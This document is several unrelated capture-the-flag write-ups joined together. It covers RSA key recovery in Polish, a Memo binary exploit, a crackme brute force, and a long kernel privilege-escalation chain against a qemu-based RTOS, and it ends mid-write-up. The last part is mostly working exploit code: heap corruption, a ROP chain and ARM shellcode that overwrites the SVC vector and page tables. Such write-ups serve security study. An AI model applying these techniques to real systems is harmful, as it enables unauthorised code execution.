62579781553994364555800120817100328166428687776427164098803076677481602221304265962340500651339469391627432175447 Co od razu daje nam `p` oraz `q`. Kolejne dwa klucze zostają złamane ponieważ współdzielą czynnik pierwszy i można go odzyskać wylicząc gcd dla każdej pary modulusów. ```pythonfor n1 in moduli: for n2 in moduli: p = gcd(n1,n2) if n1!=n2 and p!=1: print(n1,n2,p)``` Ostatni klucz padł przez faktoryzacje Fermata - liczby `p` oraz `q` były bardzo blisko `sqrt(n)`. ```pythondef fermat_factors(n): assert n % 2 != 0 a = gmpy2.isqrt(n) b2 = gmpy2.square(a) - n while not gmpy2.is_square(b2): a += 1 b2 = gmpy2.square(a) - n factor1 = a + gmpy2.isqrt(b2) factor2 = a - gmpy2.isqrt(b2) print(n, factor1, factor2) return int(factor1), int(factor2)``` Z tak odzyskanymi kluczami możemy zdekodować szyfrogramy: ```pythondef decrypt(private_key, ciphertext): """Decrypt a message with a given private key. Takes in a private_key generated by Crypto.PublicKey.RSA, which must be of size exactly 4096 If the ciphertext is invalid, return None """ if len(ciphertext) < 512 + 16: return None msg_header = ciphertext[:512] msg_iv = ciphertext[512:512 + 16] msg_body = ciphertext[512 + 16:] try: symmetric_key = PKCS1_OAEP.new(private_key).decrypt(msg_header) except ValueError as e: print(e) return None if len(symmetric_key) != 32: return None return AES.new(symmetric_key, mode=AES.MODE_CFB, IV=msg_iv).decrypt(msg_body) def get_d(n, p, e): from crypto_commons.rsa.rsa_commons import modinv, get_fi_distinct_primes phi = get_fi_distinct_primes([p, n / p]) return modinv(e, phi) def decode_i(d, e, n, i): private_key = RSA.construct((n, e, d)) with codecs.open("ct/ciphertext-" + str(i) + ".bin") as ct_file: data = ct_file.read() decrypted = decrypt(private_key, data) print(decrypted)``` W ten sposób dostajemy listę danych dla `secretsharing`: ```pythondef recover_flag(msgs): print(PlaintextToHexSecretSharer.recover_secret(msgs)) def print_results(): msgs = [ '1-32a1cd9f414f14cff6685879444acbe41e5dba6574a072cace6e8d0eb338ad64910897369b7589e6a408c861c8e708f60fbbbe91953d4a73bcf1df11e1ecaa2885bed1e5a772bfed42d776a9', '1-e0c113fa1ebea9318dd413bf28308707fd660a5d1417fbc7da72416c8baaa5bf628f11c660dcee518134353e6ff8d37c', '1-1b8b6c4e3145a96b1b0031f63521c8df58713c4d6d737039b0f1c0750e16e1579340cfc5dadef4e96d6b95ecf89f52b8136ae657c9c32e96bf4384e18bd8190546ff5102cd006be5e1580053', '1-c332b8b93a914532a2dab045ea52b86d4d3950a990b5fc5e041dce9be1fd3912f9978cad009320e18f4383ca71d9d79114c9816b5f950305a6dd19c9f458695d52', '3-17e568ddc3ed3e6fe330ca47a2b27a2707edd0e0839df59fe9114fe6c08c6fc1ac1c3c8d9ab3cf7860dac103dff464d4c215e197b54f0cb46993912c3d0220a3eb1b80adf33ee2cc59b0372c', '3-b69efb4f9c5205175a4c9afb9d3c7bef728d9fb6c9cc1241411b31d4bd18744660391a330cefa8a86af8d2b80c881cfa', '3-572e70c5acfbe8b4c2cbd47217477d217da88c256ff2586af6a18391972c258bbea6143e7cd2ff6d39393efeb64d51d9318a2c337e50e2d764a42173bc3a1d5c7c8f24b64043daf5d2a8e9f4', '3-e9e6850880eb0a44d36fe9f2e5a458c6da3977b7fcd285afa27e9bfc116b1408570991504116b81864b03a7060bfd5d3fb6e007bb346f276d749befd545d1489c4', '4-4a87367d053c533fd995032ed1e651487cb5dc1e0b1cb70a7662b152c73650f039a60f391a52f2413f43bd54eb7b12c41b42f31ac557edd4bfe46a396a8cdbe19dc9d8121924f43be51c976d', '4-abbbcee71f140198ff8c50f51069465075979c31d32b052e7ae82ec7f6783aef7b41a597f9504d3340967b8d70cbe5a3', '4-35fbbe40058e20463547b363d1f164c0bbbb97cfd9ffe7619bce31a59392f0e9625a2cd035276e09c4df3c0932f22bd322f16e375c7c7fd88da0f972832707eb549ff1e776db37649019ebce', '4-12b466934911986bda845d8d26710a12250d210546f46716c78d7a17b1f2c893b95b934c8c7beafcf81a3123eb2ea05ca89101b23349e455794a8d56608c8ee49dd', '5-7d29041c468b680fcff93c16011a2869f17de75b929b787503b412becde0321ec72fe1e499f2150a1dacb9a5f701c0b37470049dd560cef5163543469817971f50782f763f0b05ab7088f7ae', '5-a7a1e271cf263279cece532b540545fa539b0f3650e2929163b02ee5459debdc53c1e07149eb2153015bb5c88e6270e8', '5-149480c5c75cbe320564adfa432ac8ea241e048ed39c8bc6be14ca80c392487f43a7882075d785d62cb314ea6c89a6b5f28adfa56ec481e124567b88241de2a6cabcc7ec9de3acac8be5375b', '5-7285289084282d559573f68eef10191091d76d6670014202670651f867cd2bc8640a86eef1c1e482affc7ae801fa446956c2186972fb6b7bac88c91d050c9d3cca' ] recover_flag(msgs[::4]) recover_flag(msgs[1::4]) recover_flag(msgs[2::4]) recover_flag(msgs[3::4]) recover_flag(msgs[4::4])``` A za pomocą tego kodu dostajemy: ```And another one's down, and another one's down, and another one bites the dust! Three's the magic number! FLAG{ndQzjRpnSP60NgWET6jX} Pssst--- can you keep a secret? If you get all five plaintexts, there's another flag :) 1./2J6|M{g!;L oJx''`z.uOzEM )g1'-:tUx%<HE7jWoi 9#q_ZUq_:+u9?]]y/*|5ch>Ee!mGj*MAnd another one's down, and another one's down, and another one bites the dust!``` Więc niestety tylko 4 z 5 tekstów i tylko jedna flaga `FLAG{ndQzjRpnSP60NgWET6jX}`
# Exploit 200: MemoMemo is a simple binary that records strings, allows editing, and keeps a username/password:```What's user name: bkDo you wanna set password? (y/n) nok 1. Leave message on memo2. Edit message last memo3. View memo4. Delete memo5. Change password6. Quit.>> ``` it has quite a few problems 1. new_memo (0x00400c52) sets a global variable last_memo before checking in use/in bounds 2. new_memo allows overflowing onto the heap when specifying memo size, but the memo is not put in the memo array 3. new_memo stores a stack pointer (to the local memo pointer variable) into a global array after the memo array 4. edit_memo (0x00400da8) only checks if a memo is in use, not for out of bounds 5. change_password (0x00400ff6) has an off by one error, overflowing a null byte into the memo sizes array 6. there is a function at 0x00400b47, which is never called, mmaps RWX memory, reads 0x1000 bytes into it, and jumps to itthere are other bugs too, but it turns out this is exploitable with just 1, 4, and 6. It's possible to exploit it through the heap, but the last function saves a lot of time. ## new_memo sets a global variable too early```0x00400c6f call fcn.get_input0x00400c74 cdqe0x00400c76 mov qword [obj.last_memo], rax0x00400c7d mov rax, qword [obj.last_memo] ; Stores memo index0x00400c84 shl rax, 30x00400c88 add rax, 0x602a700x00400c8e mov rax, qword [rax]0x00400c91 test rax, rax ; Checks if in use0x00400c94 jne 0x400d9b0x00400c9a mov rax, qword [obj.last_memo]0x00400ca1 cmp rax, 4 ; Checks array bounds0x00400ca5 ja 0x400d87``` ## new_memo overflows the heap```0x00400d58 mov edi, 0x200x00400d5d call sub.malloc_216_870 ; malloc(0x20)0x00400d62 mov qword [rbp - new_memo], rax0x00400d66 mov rax, qword [rbp - new_memo]0x00400d6a mov rdx, qword [rbp - memo_size]0x00400d6e mov rsi, rax0x00400d71 mov edi, 00x00400d76 call sub.read_168_840 ; Read in user supplied size``` ## new_memo stores stack addresses in a global array (weird...)```0x00400cfa mov rax, qword [obj.last_memo]0x00400d01 shl rax, 30x00400d05 lea rdx, [rax + obj.memos] ; Stores memo pointer in array0x00400d0c mov rax, qword [rbp - new_memo]0x00400d10 mov qword [rdx], rax0x00400d13 mov rax, qword [obj.last_memo]0x00400d1a add rax, 5 ; Add 5 to index0x00400d1e shl rax, 30x00400d22 lea rdx, [rax + obj.memos] ; Indexing into memo array0x00400d29 lea rax, [rbp - new_memo] ; lea stack address to store there??0x00400d2d mov qword [rdx], rax0x00400d30 mov rax, qword [obj.last_memo]0x00400d37 mov rdx, qword [rbp - memo_size]0x00400d3b mov dword [rax*4 + obj.sizes], edx ; store size in array preceding memo array``` ## edit_memo only checks for in use, not out of bounds```0x00400db7 mov rax, qword [obj.last_memo]0x00400dbe shl rax, 30x00400dc2 add rax, obj.memos0x00400dc8 mov rax, qword [rax]0x00400dcb test rax, rax0x00400dce je 0x400e400x00400dd0 mov edi, str.Edit_message:``` ## the handy shellcode-executing function:```(fcn) fcn.lol 122 0x00400b47 push rbp 0x00400b48 mov rbp, rsp 0x00400b4b sub rsp, 0x100x00400b4f mov edi, str.this_is_hidden_memo_pad0x00400b54 call sub.puts_128_8180x00400b59 mov edi, str.you_can_write_anything_here0x00400b5e call sub.puts_128_8180x00400b63 mov r9d, 00x00400b69 mov r8d, 00x00400b6f mov ecx, 0x320x00400b74 mov edx, 70x00400b79 mov esi, 0x10000x00400b7e mov edi, 0x414100000x00400b83 call sub.mmap_144_828 ; mmaps with RWX0x00400b88 mov qword [rbp - local_8h], rax 0x00400b8c mov rax, qword [rbp - local_8h]0x00400b90 mov edx, 0x10000x00400b95 mov esi, 00x00400b9a mov rdi, rax 0x00400b9d call sub.memset_160_8380x00400ba2 mov rax, qword [rbp - local_8h]0x00400ba6 mov edx, 0x10000x00400bab mov rsi, rax 0x00400bae mov edi, 00x00400bb3 call sub.read_168_840 ; Reads input into this new memory0x00400bb8 mov rax, qword [rbp - local_8h]0x00400bbc call rax ; Calls our new shellcode0x00400bbe nop0x00400bbf leave0x00400bc0 ret ``` ## The ExploitThe goal is to call the shellcode-running function, which can easily be done with a stack overflow because PIE is off, and stack addresses were kindly written into the global memo array.The exploit is pretty simple, and goes like this: 1. allocate memos with index 0 and 1 2. call new_memo and ask for index 6, overwritting the last_memo variable, without leaving a memo. 3. call edit_memo, which does not check for out-of-bounds, only that the memo is not null. The memo is memo_list[6] which falls into the array of stack addresses, and length is used from memo_sizes[6] which is actually in the memo array, and is allocated. It is necessary to use index 6 rather than 5 due to differing data sizes. 4. we are now writing directly to the stack, 0x18 bytes from the return address, which we will overwrite with the nice shellcode function. 5. input shellcode, get a shell, cat flag. see solve.py bkp{you are a talented and ambitious hacker}
After having a look in ida,I deduced that the executable reads the entered password  and calculates  the following:Some pseudocode:for each password attempt {long x=0;long x=(x*128h) + (each hex value of  the password chars) }So the password is  roughly  6 or 7 chars in length , because final value from calculation  must equal :CEFF5331D4AAhfinally it checks the value of x;If the value of the x ==CEFF5331D4AAh (the value of the EDX:EAX registers ,denoting a long value) , we have a match.I thought the best approach was to try to brute force the password.So I wrote a java program and used lowercase alpha and digits to try to determine the password .The password  was "d00m3r" flag was : xiomara{MD5(password)}  flag=xiomara{48c92083dc430eb4e8af78a38f9cc877}excerpt from java program:long x=0;for (int i=0;i<password.length();i++) {                  x=(x*0x128)+ (byte)(password.charAt(i));                if (x==0xCEFF5331D4AA) {                                 System.out.println(password);                                  System.exit(0);<span>                   }</span>}
# The challenge For this challenge we receive a boot.bin image and a run.sh that runs it using qemu as follows: ```sh#!/bin/sh appline=$(head -c 1000 /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 16 | head -n 1)"BkP{This is the flag.}"qemu-system-arm -M versatilepb -cpu cortex-a15 -m 128M -nographic -kernel boot.bin -monitor /dev/null -append "$appline" 2>/dev/null``` We are also told that we must read the flag from address 0x40000000. Based on this I assumed we need to at least run code inside the qemu, and perhaps within kernel mode in order to read the flag. If we run the qemu image we get the following shell: ```shsfx@ubuntu:/mnt/hgfs/bkpctf/distrib$ ./run.sh[0] BkP RTOS version 1.0[user@main]$Available Programs: run - Run scheduled programs schedule - Switch to scheduling mode clear - Clear schedule exec - Switch to direct execution mode help - This help screen calc - Simple calculator trader - Trading platform library - Manage your library echo - Echo test exit - Restart[user@main]$``` So it seems we are dealing with an RTOS that has a few possible tasks to run. The first thing I did was playing around in the shell, run a few of the programs, etc. Next I went onto IDA, and loaded it at address 0x0 as an ARM Little Endian blob. After a bit I found out using gdb that the base address should be 0x10000, so I relocated it there. # User-space tasks So looking through the disassembly I identified the functions of the main shell by cross-referencing some of the strings. The main function after renaming and adding a few comments looks like this: ```Cvoid __noreturn task_shell(){ int sz; // r0@1 int v1; // r3@1 int v2; // r3@1 int v3; // r1@1 int v4; // r2@1 int v5; // r3@1 int v6; // r0@2 int v7; // r3@2 int v8; // r2@2 void *v9; // r3@2 int v10; // r3@2 int v11; // r3@2 int v12; // r1@2 int v13; // r2@2 int v14; // r3@2 int v15; // r1@6 int v16; // r2@6 int v17; // r3@6 int v18; // r1@12 int v19; // r2@12 int v20; // r3@12 int v21; // r3@20 int v22; // [sp+0h] [bp-88h]@2 sz = strlen((int)"[user@main]$ "); syscall(1, (int)"[user@main]$ ", sz, v1); syscall(1, (int)"\n", 1, v2); // 1 == sys_write printmenu(); syscall(6, v3, v4, v5); while ( 1 ) { memset((int)&v22, 0, 0x80u); v6 = strlen((int)"[user@main]$ "); syscall(1, (int)"[user@main]$ ", v6, v7); do_read(&v22, 128, v8, v9); // sys_read syscall(1, (int)&v22, 128, v10); syscall(1, (int)"\n", 1, v11); if ( !strcmp(&v22, "exit") ) { syscall(99, v12, v13, v14); } else if ( !strcmp(&v22, "help") ) { printmenu(); } else if ( !strcmp(&v22, "clear") ) { syscall(6, v15, v16, v17); // 6 == sys_clear ? } else if ( !strcmp(&v22, "schedule") ) { kernel_alloc[0] = 1; printf("- schedule mode -\n"); } else if ( !strcmp(&v22, "exec") ) { kernel_alloc[0] = 0; printf("- exec mode -\n"); } else if ( !strcmp(&v22, "run") ) { syscall(5, v18, v19, v20); // sys_run } else if ( !strcmp(&v22, "calc") ) { syscall(3, (int)do_calc, 0x1804C, 0); // 3 == launch task } else if ( !strcmp(&v22, "trader") ) { syscall(3, (int)do_trader, 0x1487C, (int)&dword_41B38); } else if ( !strcmp(&v22, "library") ) { syscall(3, (int)do_library, 0x101BC, (int)dword_55AE8); } else if ( !strcmp(&v22, "echo") ) { syscall(3, (int)do_echo, 0xF04C, 0); } else { syscall(1, (int)"bkpsh: command not found!\n", 26, v21); } }}```Note that some part is missing due to Hex-Rays optimizing code out because I mapped everything as ROM (and thus it assumes it's read-only). I was too lazy to fix it, but it is always good to keep in mind that Hex-Rays does use the segment attributes to decide upon optimizations and the like. Anyway, back to the challenge. After identifying a few syscalls and other functions in the main task, I turned to the library task. It turns out this task add/list/edit/delete books. This sounds like the classic heap exploitation challenge. Looking into the different functions, I identified the following issue in the page edit functionality: ```Cpage *__fastcall lib_edit_page(page *result){ item *v1; // r4@1 int pagenum; // r0@2 int *v3; // r4@3 page *page; // r6@3 unsigned int v5; // r4@4 _BYTE *v6; // r4@8 int v7; // r0@8 int v8; // [sp+0h] [bp-410h]@2 v1 = (item *)result; if ( result ) { puts((int)"Page #: "); read_0(&v8, 128); pagenum = parse_num((int)&v8;; if ( v1->numpages < pagenum ) // signed compare! { result = (page *)printf_0("Page doesn't exist\n"); } else { v3 = &v1->title + pagenum; page = (page *)v3[2]; if ( page ) { puts((int)"font: "); read_0(page->font, 48); puts((int)"content: "); read_0(&v8, 1024); v5 = strlen_0((int)&v8;; if ( v5 <= strlen_0(page->content) ) { v6 = (_BYTE *)page->content; v7 = strlen_0(page->content); result = (page *)read_0(v6, v7 - 1); } else { free(page->content); result = (page *)strdup_((int)&v8;; page->content = (int)result; } } else { result = read_page(); v3[2] = (int)result; } } } return result;}``` As you can see, a signed compare is used to determine if the page exists. This allows us to select a page BEFORE the actual book. The page structure looks as follows:```Cstruct page { char *content; char font[48];};``` So if we can provide an index to points to data we control, we'll have an arbitrary page pointer. In turn, the following code allows us to corrupt memory: ```C puts((int)"font: "); read_0(page->font, 48); puts((int)"content: "); read_0(&v8, 1024); v5 = strlen_0((int)&v8;; if ( v5 <= strlen_0(page->content) ) { v6 = (_BYTE *)page->content; v7 = strlen_0(page->content); result = (page *)read_0(v6, v7 - 1); } ``` As long as the string we provide is shorter than the string at the pointer we control. I initially went for corrupting the library itself, and ended up with a pretty complicated way of overwriting code using a chain of fake structures. While writing this, I've simplified the approach to simply write once by creating a fake page. This is the relevant python code: ```python menu()x.sendline("library") # Setup a fake page pointer within the title of our first book# write_target points to a function epilogue. list_help = 0x44009ccread_shift_sp = 0x440064c write_target = read_shift_spprint "[*] Write target: ", hex(write_target) fake_page_ptr = 0x06400818 + 12title = "AAAABBBB" + p32(fake_page_ptr) + p32(write_target)assert len(title) < 128add(title.ljust(128,"X"), []) font, content = "AAAA", "BBBB" pause()'''This changes the function epilogue from: ROM:00056AB8 84 D0 8D E2 ADD SP, SP, #0x84 ; Rd = Op1 + Op2ROM:00056ABC 30 80 BD E8 LDMFD SP!, {R4,R5,PC} ; Load Block from Memory to: 0x440064c: andeq r0, r0, r0 0x4400650: ldmfd sp!, {pc} This way we get a nice buffer overflow :)''' edit_page(1, -292, (font, content), "\x00"*4)``` So after running this, the read function will not restore the stack frame and directly pop PC from our buffer. Next is to create a ROP chain to load arbitrary shellcode. This is what I used: ```sc_size = 0x400ropchain = [ 0x440f2a8 , # : pop {r0, lr} ; bx lr 0, # this is to force r3 = 0 below, but also sys_read! 0x440e7d0, # pop {r1, r2, lr} ; mul r3, r2, r0 ; sub r1, r1, r3 ; bx lr list_help, sc_size, # read 0x400 bytes. Arbitrary number 0x440000c, # svc #0 ; pop {r4, r5, r6, r7, r8, sb, sl, fp, ip, pc} 0x41414141, # r4 0x41414141, # r5 0x41414141, # r6 0x41414141, # r7 0x41414141, # r8 0x41414141, # sb 0x41414141, # sl 0x41414141, # fp 0x41414141, # ip list_help, # pc = return into list_help] payload = "".join([p32(i) for i in ropchain])assert len(ropchain) < 128 x.sendline(payload) sc = open("sc.bin", "rb").read()x.send(sc.ljust(sc_size, "\x00"))``` As you can see, I decided to overwrite the list_help function with my shellcode and jump to it. At this point, we have full arbitrary code execution in userspace, so it's time to look at the kernel itself. # Kernel space bug I did spend quite some time analyzing all system calls in the kernel, which is not too many: * read : Simply read from UART/stdin* write : Write to UART/stdout* random : Generate a random number* exec : execute a task* schedule : schedule a task (add it to a list of tasks)* run : run all scheduled tasks* clear : clear scheduled task list* exit : exit task, i.e. run next scheduled task or go back to main shell. During reversing, I also saw that the MMU was being initialized by setting TTBR0: ```Cvoid __fastcall setup_mmu(int a1, int a2, int a3, int a4){ __mcr(15, 0, 0x2A00000u, 2, 0, 0); setup_pagetables((int *)0x2A00000); __mcr(15, 0, 1u, 3, 0, 0); __mcr(15, 0, __mrc(15, 0, 1, 0, 0) | 1, 1, 0, 0);}``` So instead of analyzing the routine to setup page tables I simply dumped them from memory using gdb and parsed them using a script (see mmu.py). Note I stopped after the last configured entry: ```VA 0x00000000 --> NO_PXN SECT PA 0x00000000 RW_PL1 VA 0x00100000 --> FAULTVA 0x00200000 --> FAULTVA 0x00300000 --> FAULTVA 0x00400000 --> FAULTVA 0x00500000 --> FAULTVA 0x00600000 --> FAULTVA 0x00700000 --> FAULTVA 0x00800000 --> FAULTVA 0x00900000 --> FAULTVA 0x00a00000 --> PXN SECT PA 0x00a00000 RW_PL1 XNVA 0x00b00000 --> PXN SECT PA 0x00b00000 RW_PL1 XNVA 0x00c00000 --> PXN SECT PA 0x00c00000 RW_PL1 XNVA 0x00d00000 --> PXN SECT PA 0x00d00000 RW_PL1 XNVA 0x00e00000 --> PXN SECT PA 0x00e00000 RW_PL1 XNVA 0x00f00000 --> PXN SECT PA 0x00f00000 RW_PL1 XNVA 0x01000000 --> PXN SECT PA 0x01000000 RW_PL1 XNVA 0x01100000 --> PXN SECT PA 0x01100000 RW_PL1 XNVA 0x01200000 --> PXN SECT PA 0x01200000 RW_PL1 XNVA 0x01300000 --> PXN SECT PA 0x01300000 RW_PL1 XNVA 0x01400000 --> PXN SECT PA 0x01400000 RW_PL1 XNVA 0x01500000 --> PXN SECT PA 0x01500000 RW_PL1 XNVA 0x01600000 --> PXN SECT PA 0x01600000 RW_PL1 XNVA 0x01700000 --> PXN SECT PA 0x01700000 RW_PL1 XNVA 0x01800000 --> PXN SECT PA 0x01800000 RW_PL1 XNVA 0x01900000 --> PXN SECT PA 0x01900000 RW_PL1 XNVA 0x01a00000 --> PXN SECT PA 0x01a00000 RW_PL1 XNVA 0x01b00000 --> PXN SECT PA 0x01b00000 RW_PL1 XNVA 0x01c00000 --> PXN SECT PA 0x01c00000 RW_PL1 XNVA 0x01d00000 --> PXN SECT PA 0x01d00000 RW_PL1 XNVA 0x01e00000 --> PXN SECT PA 0x01e00000 RW_PL1 XNVA 0x01f00000 --> PXN SECT PA 0x01f00000 RW_PL1 XNVA 0x02000000 --> PXN SECT PA 0x02000000 RW_PL1 XNVA 0x02100000 --> PXN SECT PA 0x02100000 RW_PL1 XNVA 0x02200000 --> PXN SECT PA 0x02200000 RW_PL1 XNVA 0x02300000 --> PXN SECT PA 0x02300000 RW_PL1 XNVA 0x02400000 --> PXN SECT PA 0x02400000 RW_PL1 XNVA 0x02500000 --> PXN SECT PA 0x02500000 RW_PL1 XNVA 0x02600000 --> PXN SECT PA 0x02600000 RW_PL1 XNVA 0x02700000 --> PXN SECT PA 0x02700000 RW_PL1 XNVA 0x02800000 --> FAULTVA 0x02900000 --> FAULTVA 0x02a00000 --> PXN SECT PA 0x02a00000 RW_PL1 XNVA 0x02b00000 --> PXN SECT PA 0x02b00000 RW_PL1 XNVA 0x02c00000 --> NO_PXN SECT PA 0x02c00000 RW_PL1 RO_PL0 VA 0x02d00000 --> NO_PXN SECT PA 0x02d00000 RW_PL1 RO_PL0 VA 0x02e00000 --> FAULTVA 0x02f00000 --> FAULTVA 0x03000000 --> PXN SECT PA 0x03000000 RW_PL1 XNVA 0x03100000 --> PXN SECT PA 0x03100000 RW_PL1 XNVA 0x03200000 --> PXN SECT PA 0x03200000 RW_PL1 XNVA 0x03300000 --> PXN SECT PA 0x03300000 RW_PL1 XNVA 0x03400000 --> PXN SECT PA 0x03400000 RW_PL1 XNVA 0x03500000 --> PXN SECT PA 0x03500000 RW_PL1 XNVA 0x03600000 --> PXN SECT PA 0x03600000 RW_PL1 XNVA 0x03700000 --> PXN SECT PA 0x03700000 RW_PL1 XNVA 0x03800000 --> PXN SECT PA 0x03800000 RW_PL1 XNVA 0x03900000 --> PXN SECT PA 0x03900000 RW_PL1 XNVA 0x03a00000 --> PXN SECT PA 0x03a00000 RW_PL1 XNVA 0x03b00000 --> PXN SECT PA 0x03b00000 RW_PL1 XNVA 0x03c00000 --> PXN SECT PA 0x03c00000 RW_PL1 XNVA 0x03d00000 --> PXN SECT PA 0x03d00000 RW_PL1 XNVA 0x03e00000 --> PXN SECT PA 0x03e00000 RW_PL1 XNVA 0x03f00000 --> PXN SECT PA 0x03f00000 RW_PL1 XNVA 0x04000000 --> PXN SECT PA 0x04100000 RW_PL1 XNVA 0x04100000 --> PXN SECT PA 0x04100000 RW_PL1 XNVA 0x04200000 --> PXN SECT PA 0x04200000 RW_PL1 XNVA 0x04300000 --> PXN SECT PA 0x04300000 RW_PL1 XNVA 0x04400000 --> PXN SECT PA 0x04400000 RW VA 0x04500000 --> PXN SECT PA 0x04500000 RW VA 0x04600000 --> PXN SECT PA 0x04600000 RW VA 0x04700000 --> PXN SECT PA 0x04700000 RW VA 0x04800000 --> PXN SECT PA 0x04800000 RW VA 0x04900000 --> PXN SECT PA 0x04900000 RW VA 0x04a00000 --> PXN SECT PA 0x04a00000 RW VA 0x04b00000 --> PXN SECT PA 0x04b00000 RW VA 0x04c00000 --> PXN SECT PA 0x04c00000 RW VA 0x04d00000 --> PXN SECT PA 0x04d00000 RW VA 0x04e00000 --> PXN SECT PA 0x04e00000 RW VA 0x04f00000 --> PXN SECT PA 0x04f00000 RW VA 0x05000000 --> PXN SECT PA 0x05000000 RW VA 0x05100000 --> PXN SECT PA 0x05100000 RW VA 0x05200000 --> PXN SECT PA 0x05200000 RW VA 0x05300000 --> PXN SECT PA 0x05300000 RW VA 0x05400000 --> PXN SECT PA 0x05400000 RW VA 0x05500000 --> PXN SECT PA 0x05500000 RW VA 0x05600000 --> PXN SECT PA 0x05600000 RW VA 0x05700000 --> PXN SECT PA 0x05700000 RW VA 0x05800000 --> PXN SECT PA 0x05800000 RW VA 0x05900000 --> PXN SECT PA 0x05900000 RW VA 0x05a00000 --> PXN SECT PA 0x05a00000 RW VA 0x05b00000 --> PXN SECT PA 0x05b00000 RW VA 0x05c00000 --> PXN SECT PA 0x05c00000 RW VA 0x05d00000 --> PXN SECT PA 0x05d00000 RW VA 0x05e00000 --> PXN SECT PA 0x05e00000 RW VA 0x05f00000 --> PXN SECT PA 0x05f00000 RW VA 0x06000000 --> PXN SECT PA 0x06000000 RW VA 0x06100000 --> PXN SECT PA 0x06100000 RW VA 0x06200000 --> PXN SECT PA 0x06200000 RW VA 0x06300000 --> PXN SECT PA 0x06300000 RW VA 0x06400000 --> PXN SECT PA 0x06400000 RW XNVA 0x06500000 --> PXN SECT PA 0x06500000 RW XNVA 0x06600000 --> PXN SECT PA 0x06600000 RW XNVA 0x06700000 --> PXN SECT PA 0x06700000 RW XNVA 0x06800000 --> PXN SECT PA 0x06800000 RW XNVA 0x06900000 --> PXN SECT PA 0x06900000 RW XNVA 0x06a00000 --> PXN SECT PA 0x06a00000 RW XNVA 0x06b00000 --> PXN SECT PA 0x06b00000 RW XNVA 0x06c00000 --> PXN SECT PA 0x06c00000 RW VA 0x06d00000 --> PXN SECT PA 0x06d00000 RW VA 0x06e00000 --> PXN SECT PA 0x06e00000 RW VA 0x06f00000 --> PXN SECT PA 0x06f00000 RW VA 0x07000000 --> PXN SECT PA 0x07000000 RW VA 0x07100000 --> PXN SECT PA 0x07100000 RW VA 0x07200000 --> PXN SECT PA 0x07200000 RW VA 0x07300000 --> PXN SECT PA 0x07300000 RW VA 0x07400000 --> PXN SECT PA 0x07400000 RW VA 0x07500000 --> PXN SECT PA 0x07500000 RW VA 0x07600000 --> PXN SECT PA 0x07600000 RW VA 0x07700000 --> PXN SECT PA 0x07700000 RW VA 0x07800000 --> PXN SECT PA 0x07800000 RW XNVA 0x07900000 --> PXN SECT PA 0x07900000 RW XNVA 0x07a00000 --> PXN SECT PA 0x07a00000 RW XNVA 0x07b00000 --> PXN SECT PA 0x07b00000 RW XNVA 0x07c00000 --> PXN SECT PA 0x07c00000 RW XNVA 0x07d00000 --> PXN SECT PA 0x07d00000 RW XNVA 0x07e00000 --> PXN SECT PA 0x07e00000 RW XNVA 0x07f00000 --> PXN SECT PA 0x07f00000 RW XNVA 0x08000000 --> FAULT``` There are a few interesting things here: * Kernel code is mapped as RWX.* PXN seems to be used for userland processes.* Between 0x02c00000 and 0x02e00000 there are 2MB of kernel data that are mapped RO for userspace.* The remainder of userland memory is located between 0x04400000 and 0x08000000, as we already found out during the analysis of the userland task.* The flag page does not seem to be mapped in, so we'll have to do that ourselves. As for the vulnerability, after not seeing it for a while I finally realized that the schedule syscall was not properly checking the result of kmalloc: ```Csigned int __fastcall sys_schedule(int task_name, unsigned int src, unsigned int size){ signed int ret; // r3@2 task_desc *task; // [sp+10h] [bp-14h]@18 list_desc *task_list_desc; // [sp+18h] [bp-Ch]@18 int kbuf1; // [sp+1Ch] [bp-8h]@16 if ( !validate(task_name) ) // check ptr 1, allows equality with upper range! return -1; if ( !validate(src) ) // check ptr 2 return -1; if ( !validate(src + size) ) // validate end ptr2 return -1; if ( src + size < src || src + size < size ) // verify overflows return -1; if ( size > 0x80000 ) return -1; if ( (unsigned int)strlen_1(task_name) > 31 ) return -1; if ( task_exists((char *)task_name) ) return -1; kbuf1 = kernel_malloc(size); if ( !kbuf1 ) return -1; memcpy(kbuf1, src, size); task = (task_desc *)kernel_malloc(0x28u); // Unverified!! task->buffer = kbuf1; task->size = size; strcpy((unsigned int)task->name, task_name); task_list_desc = make_list_desc((int)task); if ( task_list_desc ) { if ( task_list ) { list_add_head(task_list_desc, task_list); } else { task_list = task_list_desc; list_add_head(task_list, 0); task_scheduled = 1; } ret = 0; } else { kfree(kbuf1); kfree((int)task); ret = -1; } return ret;}``` So if we can cause memory exhaustion, we will be able to write to NULL. In particular, the task name will be written to 0x8, which conveniently contains the SVC reset vector. This is thus the plan of attack: 1. Almost exhaust all memory by using adding tasks to the schedule list. Note that we need a different task name each time, so I'm just calling the random() system call and using that as task name.2. Add a final task for which the first kmalloc() will succeed, and the second one will fail. This task name will be written on top of the SVC handler.3. Trigger an svc to execute our newly introduced code. ## Step 1: exhausting memory For exhausting memory, I wrote a simple loop with a task of the maximum allowed size: ```asm.text.globl startstart: ldr r9, =#59 sub sp, sp, #0x400 mov r11, sp loop: bl rand str r0, [sp] eor r0, r0 str r0, [sp, #4] mov r1, sp ldr r2, =#0x04400000 ldr r3, =#0x7f000 bl sched cmp r0, #0x0 moveq r3, #79 movne r3, #78 str r3, [sp] mov r3, #0x0A str r3, [sp, #0x01] mov r1, sp mov r2, #0x2 bl write sub r9, r9, #0x1 cmp r9, #0 bne loop lastone: bl rand str r0, [sp] eor r0, r0 str r0, [sp, #4] mov r1, sp ldr r2, =#0x04400000 ldr r3, =#0x6dfe0 bl sched``` At each step of the loop we are actually writing O (for OK) or N (for Not OK) depending on the syscall result. I used this initially to determine how many iterations of the loop I needed. After this, I decided to read in the task name from the exploit and trigger the final schedule call: ```asmdone: @ Signal Done to get our new instructions mov r3, #68 str r3, [sp] mov r3, #0x0A str r3, [sp, #0x01] mov r1, sp mov r2, #0x2 bl write @ Read instructions to put at 0x8 mov r1, sp mov r2, #0x10 bl read mov r1, sp ldr r2, =#0x04400000 ldr r3, =#0x4bb00 bl sched``` After this point, our rewritten SVC handler would be ready to execute. I decided to replace it by the following code: ```asmstr r7, [r8, #4]ldr pc, [pc, #20] ; 0x28``` This effectively gives us an arbitrary write using r7 and r8, and then calls the original syscall handler. I used this to change an L1 page table descriptor to be able to read the flag, and then dump it using the write syscall: ```asm @Invalid syscall should result in a write to memory ldr r7, =#0x04000c03 ldr r8, =#0x2a00140 sub r8, r8, #0x4 ldr r1, =#0x05000000 mov r2, #0x20 bl write end: bl rand b end``` We then assemble the shellcode and extract the binary: 